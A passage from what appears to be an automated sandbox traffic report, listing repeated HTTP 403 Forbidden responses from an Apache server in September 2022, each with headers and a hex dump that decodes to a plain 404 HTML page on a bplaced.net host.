3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:56 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=110X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:57 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=85X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:58 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=109X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:59 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=113X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:00 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=68X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:01 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=119X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:02 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=107X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 